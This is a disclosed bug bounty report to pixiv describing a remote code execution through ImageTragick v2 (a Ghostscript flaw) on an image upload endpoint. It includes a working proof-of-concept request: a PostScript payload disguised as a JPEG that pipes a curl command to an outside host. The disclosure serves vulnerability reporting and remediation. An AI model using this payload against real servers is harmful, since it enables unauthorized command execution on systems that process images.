RCE due to ImageTragick v2

Disclosed: 2021-03-16 15:35:11 By chaosbolt To pixiv
Critical
Vulnerability Details
Hello Pixiv team! Your Image processing process suffering from ImageTragick v2. Issue is caused by ghostscript RCE findnings. How to reproduce: PATCH /design Host: manage.booth.pm send following image: ``` ------WebKitFormBoundaryXX05yrKS4g8d9CWh Content-Disposition: form-data; name="shop[header]"; filename="imagetragick.jpeg" Content-Type: image/jpeg %!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%curl https://avtohanter.ru/qwetest) currentdevice putdeviceprops ------WebKitFormBoundaryXX05yrKS4g8d9CWh-- ``` How to fix: Update ImageMagick, should help ## Impact Remote Code Execution
Actions
View on HackerOne
Report Stats
  • Report ID: 402362
  • State: Closed
  • Substate: resolved
  • Upvotes: 41
Share this report